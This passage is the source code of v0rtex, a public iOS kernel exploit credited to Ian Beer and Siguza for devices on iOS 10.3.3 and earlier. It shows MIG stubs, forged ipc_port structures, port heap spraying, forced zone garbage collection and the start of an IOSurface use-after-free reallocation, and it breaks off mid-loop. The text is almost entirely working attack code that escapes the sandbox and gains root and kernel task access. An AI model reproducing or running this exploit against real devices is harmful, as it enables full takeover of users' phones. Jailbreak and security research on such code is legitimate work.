// v0rtex2.m
// NOTE: the original listing header ("v0rtex2.m 47 KB") and the source
// viewer's line-number gutter were extraction artifacts, removed here.
  1. // v0rtex
  2. // Bug by Ian Beer.
  3. // Exploit by Siguza.
  4. // Status quo:
  5. // - Escapes sandbox, gets root and tfp0, should work on A7-A10 devices <=10.3.3.
  6. // - Can call arbitrary kernel functions with up to 7 args via KCALL().
  7. // - Relies on mach_zone_force_gc() which was removed in iOS 11, but the same
  8. // effect should be achievable by continuously spraying through zones and
  9. // measuring how long it takes - garbage collection usually takes ages. :P
  10. // - Occasionally seems to mess with SpringBoard, i.e. apps don't open when you
  11. // tap on their icons - sometimes affects only v0rtex, sometimes all of them,
  12. // sometimes even freezes the lock screen. Can happen even if the exploit
  13. // aborts very early on, so I'm not sure whether it's even due to that, or due
  14. // to my broken UI.
  15. // - Most common panic at this point is "pmap_tte_deallocate(): ... refcnt=0x1",
  16. // which can occur when the app is killed, but only if shmem_addr has been
  17. // faulted before. Faulting that page can _sometimes_ increase the ref count
  18. // on its tte entry, which causes the mentioned panic when the task is
  19. // destroyed and its pmap with it. Exact source of this is unknown, but I
  20. // suspect it happening in pmap_enter_options_internal(), depending on page
  21. // compression status (i.e. if the page is compressed refcnt_updated is set to
  22. // true and the ref count isn't increased afterwards, otherwise it is).
  23. // On 32-bit such a panic can be temporarily averted with mlock(), but that
  24. // seems to cause even greater trouble later with zalloc, and on 64-bit mlock
  25. // even refuses to work. Deallocating shmem_addr from our address space does
  26. // not fix the problem, and neither does allocating new memory at that address
  27. // and faulting into it (which should _guarantee_ that the corresponding pmap
  28. // entry is updated). Fixing up the ref count manually is very tedious and
  29. // still seems to cause trouble with zalloc. Calling mach_zone_force_gc()
  30. // after releasing the IOSurfaceRootUserClient port seems to _somewhat_ help,
  31. // as does calling sched_yield() before mach_vm_remap() and faulting the page
  32. // right after, so that's what I'm doing for now.
  33. // In the long term, this should really be replaced by something deterministic
  34. // that _always_ works (like removing the tte entirely).
  35. // Not sure what'll really become of this, but it's certainly not done yet.
  36. // Pretty sure I'll leave iOS 11 to Ian Beer though, for the time being.
  37. #include <errno.h> // errno
  38. #include <sched.h> // sched_yield
  39. #include <stdlib.h> // malloc, free
  40. #include <string.h> // strerror, memset
  41. #include <unistd.h> // usleep, setuid, getuid
  42. #include <mach/mach.h>
  43. #include <mach-o/loader.h>
  44. #include <CoreFoundation/CoreFoundation.h>
  45. #include "common2.h" // LOG, kptr_t
  46. #include "offsets2.h"
  47. #include "v0rtex2.h"
// ********** ********** ********** get rid of ********** ********** **********
// Hardcoded kernel object offsets - should eventually come from the caller's
// offsets_t instead (hence "get rid of").
#ifdef __LP64__
# define OFFSET_TASK_ITK_SELF 0xd8      // offset of itk_self in struct task (see ktask_t.b below)
# define OFFSET_IOUSERCLIENT_IPC 0x9c   // NOTE(review): presumably IOUserClient's retain/IPC count - confirm against target build
#else
# define OFFSET_TASK_ITK_SELF 0x9c
# define OFFSET_IOUSERCLIENT_IPC 0x5c
#endif
// Size of the output struct returned by IOSurface create (selector 0); version-dependent.
#define IOSURFACE_CREATE_OUTSIZE 0x3c8 /* XXX 0x6c8 for iOS 11.0, 0xbc8 for 11.1.2 */
// ********** ********** ********** constants ********** ********** **********
#ifdef __LP64__
# define KERNEL_MAGIC MH_MAGIC_64       // Mach-O magic expected at the kernel header
# define KERNEL_HEADER_OFFSET 0x4000    // offset of the Mach-O header within the kernel image
#else
# define KERNEL_MAGIC MH_MAGIC
# define KERNEL_HEADER_OFFSET 0x1000
#endif
#define KERNEL_SLIDE_STEP 0x100000      // KASLR slide granularity used when scanning
#define NUM_BEFORE 0x2000               // ports sprayed before the target port
#define NUM_AFTER 0x1000                // ports sprayed after the target port
#define NUM_DATA 0x4000                 // number of IOSurface property sprays for reallocation
#define DATA_SIZE 0x1000                // byte size of each spray buffer
#ifdef __LP64__
# define VTAB_SIZE 200                  // number of vtable slots to clone (NOTE(review): used past this view - confirm)
#else
# define VTAB_SIZE 250
#endif
// External method selectors of IOSurfaceRootUserClient used below.
const uint64_t IOSURFACE_CREATE_SURFACE = 0;
const uint64_t IOSURFACE_SET_VALUE = 9;
const uint64_t IOSURFACE_GET_VALUE = 10;
const uint64_t IOSURFACE_DELETE_VALUE = 11;
// ipc_kobject type tag for kernel task ports.
const uint32_t IKOT_TASK = 2;
// Tag values of the binary OSSerialize format (consumed by the kernel's
// OSUnserializeBinary); each 32-bit word is a tag in the top byte plus a
// 24-bit length/value in the bottom bytes.
enum
{
    kOSSerializeDictionary = 0x01000000U,
    kOSSerializeArray = 0x02000000U,
    kOSSerializeSet = 0x03000000U,
    kOSSerializeNumber = 0x04000000U,
    kOSSerializeSymbol = 0x08000000U,
    kOSSerializeString = 0x09000000U,
    kOSSerializeData = 0x0a000000U,
    kOSSerializeBoolean = 0x0b000000U,
    kOSSerializeObject = 0x0c000000U,
    kOSSerializeTypeMask = 0x7F000000U,   // mask selecting the tag byte
    kOSSerializeDataMask = 0x00FFFFFFU,   // mask selecting the embedded length/value
    kOSSerializeEndCollection = 0x80000000U, // OR'd onto the last element of a collection
    kOSSerializeMagic = 0x000000d3U,      // stream header magic
};
// ********** ********** ********** macros ********** ********** **********
// Round addr up to the next 8-byte boundary.
#define UINT64_ALIGN(addr) (((addr) + 7) & ~7)
// Copy `size` bytes in 32-bit chunks through volatile pointers, so the
// compiler can neither widen nor elide the accesses (the destination may be
// only 4-byte aligned even when it holds 64-bit fields).
#define UNALIGNED_COPY(src, dst, size) \
do \
{ \
for(volatile uint32_t *_src = (volatile uint32_t*)(src), \
*_dst = (volatile uint32_t*)(dst), \
*_end = (volatile uint32_t*)((uintptr_t)(_src) + (size)); \
_src < _end; \
*(_dst++) = *(_src++) \
); \
} while(0)
// Read a kernel pointer from a possibly 4-byte-aligned address: two 32-bit
// loads stitched together on LP64, a single load on 32-bit.
#ifdef __LP64__
# define UNALIGNED_KPTR_DEREF(addr) (((kptr_t)*(volatile uint32_t*)(addr)) | (((kptr_t)*((volatile uint32_t*)(addr) + 1)) << 32))
#else
# define UNALIGNED_KPTR_DEREF(addr) ((kptr_t)*(volatile uint32_t*)(addr))
#endif
// Zero `size` bytes word-by-word through a volatile pointer (not optimizable away).
#define VOLATILE_ZERO(addr, size) \
do \
{ \
for(volatile uintptr_t *ptr = (volatile uintptr_t*)(addr), \
*end = (volatile uintptr_t*)((uintptr_t)(ptr) + (size)); \
ptr < end; \
*(ptr++) = 0 \
); \
} while(0)
// Destroy a port if it is valid and reset the variable to MACH_PORT_NULL.
#define RELEASE_PORT(port) \
do \
{ \
if(MACH_PORT_VALID((port))) \
{ \
_kernelrpc_mach_port_destroy_trap(self, (port)); \
port = MACH_PORT_NULL; \
} \
} while(0)
// ********** ********** ********** IOKit ********** ********** **********
// Minimal IOKit declarations, hand-written to avoid linking the IOKit
// framework headers.
typedef mach_port_t io_service_t;
typedef mach_port_t io_connect_t;
extern const mach_port_t kIOMasterPortDefault;
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *client);
kern_return_t IOServiceClose(io_connect_t client);
kern_return_t IOConnectCallStructMethod(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
kern_return_t IOConnectCallAsyncStructMethod(mach_port_t connection, uint32_t selector, mach_port_t wake_port, uint64_t *reference, uint32_t referenceCnt, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);
// ********** ********** ********** other unexported symbols ********** ********** **********
kern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);
  144. // ********** ********** ********** helpers ********** ********** **********
  145. static const char *errstr(int r)
  146. {
  147. return r == 0 ? "success" : strerror(r);
  148. }
  149. static uint32_t transpose(uint32_t val)
  150. {
  151. uint32_t ret = 0;
  152. for(size_t i = 0; val > 0; i += 8)
  153. {
  154. ret += (val % 255) << i;
  155. val /= 255;
  156. }
  157. return ret + 0x01010101;
  158. }
// ********** ********** ********** MIG ********** ********** **********
// Hand-rolled MIG client stub for mach_zone_force_gc(host) - routine id 221 -
// which forces the kernel to garbage-collect empty zone pages. Written by
// hand because the routine was removed from newer SDKs.
// Returns the mach_msg error, or the server-side RetCode on successful RPC.
static kern_return_t my_mach_zone_force_gc(host_t host)
{
#pragma pack(4)
    // Request carries no arguments beyond the header.
    typedef struct {
        mach_msg_header_t Head;
    } Request;
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_msg_trailer_t trailer;
    } Reply;
#pragma pack()
    // Request and reply share one buffer, as in MIG-generated code.
    union {
        Request In;
        Reply Out;
    } Mess;
    Request *InP = &Mess.In;
    Reply *OutP = &Mess.Out;
    // 19 == MACH_MSG_TYPE_COPY_SEND for the remote (host) port.
    InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    InP->Head.msgh_remote_port = host;
    InP->Head.msgh_local_port = mig_get_reply_port();
    InP->Head.msgh_id = 221; // mach_zone_force_gc
    InP->Head.msgh_reserved = 0;
    // Combined send + receive on the reply port.
    kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if(ret == KERN_SUCCESS)
    {
        ret = OutP->RetCode; // propagate the server-side result
    }
    return ret;
}
// Hand-rolled MIG stub for mach_port_get_context() (mach_port subsystem,
// routine id 3228). Reads the 64-bit context value attached to port `name`
// in `task`'s IPC space into *context. Used by the exploit to read back data
// through a fake port overlapping controlled memory.
static kern_return_t my_mach_port_get_context(task_t task, mach_port_name_t name, mach_vm_address_t *context)
{
#pragma pack(4)
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        mach_port_name_t name;
    } Request;
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_vm_address_t context;
        mach_msg_trailer_t trailer;
    } Reply;
#pragma pack()
    union {
        Request In;
        Reply Out;
    } Mess;
    Request *InP = &Mess.In;
    Reply *OutP = &Mess.Out;
    InP->NDR = NDR_record;
    InP->name = name;
    // 19 == MACH_MSG_TYPE_COPY_SEND for the remote (task) port.
    InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    InP->Head.msgh_remote_port = task;
    InP->Head.msgh_local_port = mig_get_reply_port();
    InP->Head.msgh_id = 3228; // mach_port_get_context
    InP->Head.msgh_reserved = 0;
    kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if(ret == KERN_SUCCESS)
    {
        ret = OutP->RetCode;
    }
    // Only copy out on full success of both transport and routine.
    if(ret == KERN_SUCCESS)
    {
        *context = OutP->context;
    }
    return ret;
}
// Hand-rolled MIG stub for mach_port_set_context() (mach_port subsystem,
// routine id 3229). Attaches the 64-bit value `context` to port `name` in
// `task`'s IPC space. Counterpart of my_mach_port_get_context() above;
// non-static, so other translation units can use it too.
kern_return_t my_mach_port_set_context(task_t task, mach_port_name_t name, mach_vm_address_t context)
{
#pragma pack(4)
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        mach_port_name_t name;
        mach_vm_address_t context;
    } Request;
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_msg_trailer_t trailer;
    } Reply;
#pragma pack()
    union {
        Request In;
        Reply Out;
    } Mess;
    Request *InP = &Mess.In;
    Reply *OutP = &Mess.Out;
    InP->NDR = NDR_record;
    InP->name = name;
    InP->context = context;
    // 19 == MACH_MSG_TYPE_COPY_SEND for the remote (task) port.
    InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    InP->Head.msgh_remote_port = task;
    InP->Head.msgh_local_port = mig_get_reply_port();
    InP->Head.msgh_id = 3229; // mach_port_set_context
    InP->Head.msgh_reserved = 0;
    kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if(ret == KERN_SUCCESS)
    {
        ret = OutP->RetCode;
    }
    return ret;
}
  268. // Raw MIG function for a merged IOSurface deleteValue + setValue call, attempting to increase performance.
  269. // Prepare everything - sched_yield() - fire.
  270. static kern_return_t reallocate_buf(io_connect_t client, uint32_t surfaceId, uint32_t propertyId, void *buf, mach_vm_size_t len)
  271. {
  272. #pragma pack(4)
  273. typedef struct {
  274. mach_msg_header_t Head;
  275. NDR_record_t NDR;
  276. uint32_t selector;
  277. mach_msg_type_number_t scalar_inputCnt;
  278. mach_msg_type_number_t inband_inputCnt;
  279. uint32_t inband_input[4];
  280. mach_vm_address_t ool_input;
  281. mach_vm_size_t ool_input_size;
  282. mach_msg_type_number_t inband_outputCnt;
  283. mach_msg_type_number_t scalar_outputCnt;
  284. mach_vm_address_t ool_output;
  285. mach_vm_size_t ool_output_size;
  286. } DeleteRequest;
  287. typedef struct {
  288. mach_msg_header_t Head;
  289. NDR_record_t NDR;
  290. uint32_t selector;
  291. mach_msg_type_number_t scalar_inputCnt;
  292. mach_msg_type_number_t inband_inputCnt;
  293. mach_vm_address_t ool_input;
  294. mach_vm_size_t ool_input_size;
  295. mach_msg_type_number_t inband_outputCnt;
  296. mach_msg_type_number_t scalar_outputCnt;
  297. mach_vm_address_t ool_output;
  298. mach_vm_size_t ool_output_size;
  299. } SetRequest;
  300. typedef struct {
  301. mach_msg_header_t Head;
  302. NDR_record_t NDR;
  303. kern_return_t RetCode;
  304. mach_msg_type_number_t inband_outputCnt;
  305. char inband_output[4096];
  306. mach_msg_type_number_t scalar_outputCnt;
  307. uint64_t scalar_output[16];
  308. mach_vm_size_t ool_output_size;
  309. mach_msg_trailer_t trailer;
  310. } Reply;
  311. #pragma pack()
  312. // Delete
  313. union {
  314. DeleteRequest In;
  315. Reply Out;
  316. } DMess;
  317. DeleteRequest *DInP = &DMess.In;
  318. Reply *DOutP = &DMess.Out;
  319. DInP->NDR = NDR_record;
  320. DInP->selector = IOSURFACE_DELETE_VALUE;
  321. DInP->scalar_inputCnt = 0;
  322. DInP->inband_input[0] = surfaceId;
  323. DInP->inband_input[2] = transpose(propertyId);
  324. DInP->inband_input[3] = 0x0; // Null terminator
  325. DInP->inband_inputCnt = sizeof(DInP->inband_input);
  326. DInP->ool_input = 0;
  327. DInP->ool_input_size = 0;
  328. DInP->inband_outputCnt = sizeof(uint32_t);
  329. DInP->scalar_outputCnt = 0;
  330. DInP->ool_output = 0;
  331. DInP->ool_output_size = 0;
  332. DInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  333. DInP->Head.msgh_remote_port = client;
  334. DInP->Head.msgh_local_port = mig_get_reply_port();
  335. DInP->Head.msgh_id = 2865;
  336. DInP->Head.msgh_reserved = 0;
  337. // Set
  338. union {
  339. SetRequest In;
  340. Reply Out;
  341. } SMess;
  342. SetRequest *SInP = &SMess.In;
  343. Reply *SOutP = &SMess.Out;
  344. SInP->NDR = NDR_record;
  345. SInP->selector = IOSURFACE_SET_VALUE;
  346. SInP->scalar_inputCnt = 0;
  347. SInP->inband_inputCnt = 0;
  348. SInP->ool_input = (mach_vm_address_t)buf;
  349. SInP->ool_input_size = len;
  350. SInP->inband_outputCnt = sizeof(uint32_t);
  351. SInP->scalar_outputCnt = 0;
  352. SInP->ool_output = 0;
  353. SInP->ool_output_size = 0;
  354. SInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  355. SInP->Head.msgh_remote_port = client;
  356. SInP->Head.msgh_local_port = mig_get_reply_port();
  357. SInP->Head.msgh_id = 2865;
  358. SInP->Head.msgh_reserved = 0;
  359. // Deep breath
  360. sched_yield();
  361. // Fire
  362. kern_return_t ret = mach_msg(&DInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(DeleteRequest), (mach_msg_size_t)sizeof(Reply), DInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  363. if(ret == KERN_SUCCESS)
  364. {
  365. ret = DOutP->RetCode;
  366. }
  367. if(ret != KERN_SUCCESS)
  368. {
  369. return ret;
  370. }
  371. ret = mach_msg(&SInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(SetRequest), (mach_msg_size_t)sizeof(Reply), SInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  372. if(ret == KERN_SUCCESS)
  373. {
  374. ret = SOutP->RetCode;
  375. }
  376. return ret;
  377. }
// ********** ********** ********** data structures ********** ********** **********
#ifdef __LP64__
// Userland mirror of the header of a kernel vm_map entry list
// (prev/next links plus the mapped address range). LP64-only.
typedef struct
{
    kptr_t prev;   // previous entry in the map's doubly linked list
    kptr_t next;   // next entry
    kptr_t start;  // start address of the mapping
    kptr_t end;    // end address of the mapping
} kmap_hdr_t;
#endif
// Userland mirror of the kernel's struct ipc_port layout, used to forge a
// fake port inside sprayed IOSurface property data. Field offsets must match
// the target kernel exactly; LP64 padding fields are made explicit.
typedef struct {
    uint32_t ip_bits;         // io_bits: active flag, otype, kotype
    uint32_t ip_references;   // io_references
    struct {
        kptr_t data;
        uint32_t type;
#ifdef __LP64__
        uint32_t pad;
#endif
    } ip_lock; // spinlock
    struct {
        struct {
            struct {
                uint32_t flags;
                uint32_t waitq_interlock;
                uint64_t waitq_set_id;
                uint64_t waitq_prepost_id;
                struct {
                    kptr_t next;
                    kptr_t prev;
                } waitq_queue;
            } waitq;
            kptr_t messages;        // message queue head
            uint32_t seqno;
            uint32_t receiver_name; // name in the receiver's IPC space
            uint16_t msgcount;
            uint16_t qlimit;
#ifdef __LP64__
            uint32_t pad;
#endif
        } port;
        kptr_t klist;
    } ip_messages;
    kptr_t ip_receiver;   // ipc_space of the receive right's holder
    kptr_t ip_kobject;    // kernel object pointer (e.g. a task for IKOT_TASK)
    kptr_t ip_nsrequest;
    kptr_t ip_pdrequest;
    kptr_t ip_requests;
    kptr_t ip_premsg;
    uint64_t ip_context;  // 64-bit context - readable via mach_port_get_context()
    uint32_t ip_flags;
    uint32_t ip_mscount;
    uint32_t ip_srights;  // send right count
    uint32_t ip_sorights; // send-once right count
} kport_t;
// Userland mirror of the kernel's ipc_port_request table entry
// (notification slot): a notify port or free-list index, and a name or size.
typedef struct {
    union {
        kptr_t port;     // registered notification port
        uint32_t index;  // next free slot when unused
    } notify;
    union {
        uint32_t name;   // port name the request is for
        kptr_t size;     // table size (slot 0)
    } name;
} kport_request_t;
// Two overlapping views of the kernel's struct task:
// - `a`: the leading fields (mutex, refcount, state, vm_map pointer);
// - `b`: raw padding up to OFFSET_TASK_ITK_SELF so itk_self (the task's
//   self port pointer) can be addressed directly.
typedef union
{
    struct {
        struct {
            kptr_t data;
            uint32_t reserved : 24,
                     type     :  8;
#ifdef __LP64__
            uint32_t pad;
#endif
        } lock; // mutex lock
        uint32_t ref_count;
        uint32_t active;
        uint32_t halting;
#ifdef __LP64__
        uint32_t pad;
#endif
        kptr_t map; // the task's vm_map
    } a;
    struct {
        char pad[OFFSET_TASK_ITK_SELF];
        kptr_t itk_self; // task self port
    } b;
} ktask_t;
  467. // ********** ********** ********** exploit ********** ********** **********
  468. //kern_return_t v0rtex(offsets_t *off, v0rtex_cb_t callback, void *cb_data)
  469. kern_return_t v0rtex(offsets_t *off, task_t *tfp0, kptr_t *kslide, kptr_t *kernucred)
  470. {
  471. kern_return_t retval = KERN_FAILURE,
  472. ret = 0;
  473. task_t self = mach_task_self();
  474. host_t host = mach_host_self();
  475. io_connect_t client = MACH_PORT_NULL;
  476. mach_port_t stuffport = MACH_PORT_NULL;
  477. mach_port_t realport = MACH_PORT_NULL;
  478. mach_port_t before[NUM_BEFORE] = { MACH_PORT_NULL };
  479. mach_port_t port = MACH_PORT_NULL;
  480. mach_port_t after[NUM_AFTER] = { MACH_PORT_NULL };
  481. mach_port_t fakeport = MACH_PORT_NULL;
  482. mach_vm_address_t shmem_addr = 0;
  483. mach_port_array_t maps = NULL;
  484. io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
  485. LOG("service: %x", service);
  486. if(!MACH_PORT_VALID(service))
  487. {
  488. goto out;
  489. }
  490. ret = IOServiceOpen(service, self, 0, &client);
  491. LOG("client: %x, %s", client, mach_error_string(ret));
  492. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(client))
  493. {
  494. goto out;
  495. }
  496. uint32_t dict_create[] =
  497. {
  498. kOSSerializeMagic,
  499. kOSSerializeEndCollection | kOSSerializeDictionary | 1,
  500. kOSSerializeSymbol | 19,
  501. 0x75534f49, 0x63616672, 0x6c6c4165, 0x6953636f, 0x657a, // "IOSurfaceAllocSize"
  502. kOSSerializeEndCollection | kOSSerializeNumber | 32,
  503. 0x1000,
  504. 0x0,
  505. };
  506. union
  507. {
  508. char _padding[IOSURFACE_CREATE_OUTSIZE];
  509. struct
  510. {
  511. mach_vm_address_t addr1;
  512. mach_vm_address_t addr2;
  513. uint32_t id;
  514. } data;
  515. } surface;
  516. memset(&surface, 0, sizeof(surface));
  517. size_t size = sizeof(surface);
  518. ret = IOConnectCallStructMethod(client, IOSURFACE_CREATE_SURFACE, dict_create, sizeof(dict_create), &surface, &size);
  519. LOG("newSurface: %s", mach_error_string(ret));
  520. if(ret != KERN_SUCCESS)
  521. {
  522. goto out;
  523. }
  524. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &stuffport);
  525. LOG("stuffport: %x, %s", stuffport, mach_error_string(ret));
  526. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(stuffport))
  527. {
  528. goto out;
  529. }
  530. ret = _kernelrpc_mach_port_insert_right_trap(self, stuffport, stuffport, MACH_MSG_TYPE_MAKE_SEND);
  531. LOG("mach_port_insert_right: %s", mach_error_string(ret));
  532. if(ret != KERN_SUCCESS)
  533. {
  534. goto out;
  535. }
  536. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &realport);
  537. LOG("realport: %x, %s", realport, mach_error_string(ret));
  538. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(realport))
  539. {
  540. goto out;
  541. }
  542. sched_yield();
  543. // Clean out full pages already in freelists
  544. ret = my_mach_zone_force_gc(host);
  545. if(ret != KERN_SUCCESS)
  546. {
  547. LOG("mach_zone_force_gc: %s", mach_error_string(ret));
  548. goto out;
  549. }
  550. for(size_t i = 0; i < NUM_BEFORE; ++i)
  551. {
  552. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &before[i]);
  553. if(ret != KERN_SUCCESS)
  554. {
  555. LOG("mach_port_allocate: %s", mach_error_string(ret));
  556. goto out;
  557. }
  558. }
  559. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &port);
  560. if(ret != KERN_SUCCESS)
  561. {
  562. LOG("mach_port_allocate: %s", mach_error_string(ret));
  563. goto out;
  564. }
  565. if(!MACH_PORT_VALID(port))
  566. {
  567. LOG("port: %x", port);
  568. goto out;
  569. }
  570. for(size_t i = 0; i < NUM_AFTER; ++i)
  571. {
  572. ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &after[i]);
  573. if(ret != KERN_SUCCESS)
  574. {
  575. LOG("mach_port_allocate: %s", mach_error_string(ret));
  576. goto out;
  577. }
  578. }
  579. LOG("port: %x", port);
  580. ret = _kernelrpc_mach_port_insert_right_trap(self, port, port, MACH_MSG_TYPE_MAKE_SEND);
  581. LOG("mach_port_insert_right: %s", mach_error_string(ret));
  582. if(ret != KERN_SUCCESS)
  583. {
  584. goto out;
  585. }
  586. #pragma pack(4)
  587. typedef struct {
  588. mach_msg_base_t base;
  589. mach_msg_ool_ports_descriptor_t desc[2];
  590. } StuffMsg;
  591. #pragma pack()
  592. StuffMsg msg;
  593. msg.base.header.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
  594. msg.base.header.msgh_remote_port = stuffport;
  595. msg.base.header.msgh_local_port = MACH_PORT_NULL;
  596. msg.base.header.msgh_id = 1234;
  597. msg.base.header.msgh_reserved = 0;
  598. msg.base.body.msgh_descriptor_count = 2;
  599. msg.desc[0].address = before;
  600. msg.desc[0].count = NUM_BEFORE;
  601. msg.desc[0].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
  602. msg.desc[0].deallocate = FALSE;
  603. msg.desc[0].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
  604. msg.desc[1].address = after;
  605. msg.desc[1].count = NUM_AFTER;
  606. msg.desc[1].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
  607. msg.desc[1].deallocate = FALSE;
  608. msg.desc[1].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
  609. ret = mach_msg(&msg.base.header, MACH_SEND_MSG, (mach_msg_size_t)sizeof(msg), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  610. LOG("mach_msg: %s", mach_error_string(ret));
  611. if(ret != KERN_SUCCESS)
  612. {
  613. goto out;
  614. }
  615. for(size_t i = 0; i < NUM_BEFORE; ++i)
  616. {
  617. RELEASE_PORT(before[i]);
  618. }
  619. for(size_t i = 0; i < NUM_AFTER; ++i)
  620. {
  621. RELEASE_PORT(after[i]);
  622. }
  623. uint32_t dict[DATA_SIZE / sizeof(uint32_t) + 7] =
  624. {
  625. // Some header or something
  626. surface.data.id,
  627. 0x0,
  628. kOSSerializeMagic,
  629. kOSSerializeEndCollection | kOSSerializeArray | 2,
  630. kOSSerializeString | (DATA_SIZE - 1),
  631. };
  632. dict[DATA_SIZE / sizeof(uint32_t) + 5] = kOSSerializeEndCollection | kOSSerializeString | 4;
  633. // ipc.ports zone uses 0x3000 allocation chunks, but hardware page size before A9
  634. // is actually 0x1000, so references to our reallocated memory may be shifted
  635. // by (0x1000 % sizeof(kport_t))
  636. kport_t triple_kport =
  637. {
  638. .ip_lock =
  639. {
  640. .data = 0x0,
  641. .type = 0x11,
  642. },
  643. #ifdef __LP64__
  644. .ip_messages =
  645. {
  646. .port =
  647. {
  648. .waitq =
  649. {
  650. .waitq_queue =
  651. {
  652. .next = 0x0,
  653. .prev = 0x11,
  654. }
  655. },
  656. },
  657. },
  658. .ip_nsrequest = 0x0,
  659. .ip_pdrequest = 0x11,
  660. #endif
  661. };
  662. for(uintptr_t ptr = (uintptr_t)&dict[5], end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
  663. {
  664. UNALIGNED_COPY(&triple_kport, ptr, sizeof(kport_t));
  665. }
  666. // There seems to be some weird asynchronity with freeing on IOConnectCallAsyncStructMethod,
  667. // which sucks. To work around it, I register the port to be freed on my own task (thus increasing refs),
  668. // sleep after the connect call and register again, thus releasing the reference synchronously.
  669. ret = mach_ports_register(self, &port, 1);
  670. LOG("mach_ports_register: %s", mach_error_string(ret));
  671. if(ret != KERN_SUCCESS)
  672. {
  673. goto out;
  674. }
  675. uint64_t ref = 0;
  676. uint64_t in[3] = { 0, 0x666, 0 };
  677. IOConnectCallAsyncStructMethod(client, 17, realport, &ref, 1, in, sizeof(in), NULL, NULL);
  678. IOConnectCallAsyncStructMethod(client, 17, port, &ref, 1, in, sizeof(in), NULL, NULL);
  679. LOG("herp derp");
  680. usleep(300000);
  681. sched_yield();
  682. ret = mach_ports_register(self, &client, 1); // gonna use that later
  683. LOG("mach_ports_register: %s", mach_error_string(ret));
  684. if(ret != KERN_SUCCESS)
  685. {
  686. goto out;
  687. }
  688. LOG("herp derp mcgerp");
  689. usleep(300000);
  690. // Prevent cleanup
  691. fakeport = port;
  692. port = MACH_PORT_NULL;
  693. // Release port with ool port refs
  694. RELEASE_PORT(stuffport);
  695. sched_yield();
  696. ret = my_mach_zone_force_gc(host);
  697. if(ret != KERN_SUCCESS)
  698. {
  699. LOG("mach_zone_force_gc: %s", mach_error_string(ret));
  700. goto out;
  701. }
  702. LOG("herp derp bajerp");
  703. usleep(300000);
  704. for(uint32_t i = 0; i < NUM_DATA; ++i)
  705. {
  706. dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(i);
  707. kport_t *dptr = (kport_t*)&dict[5];
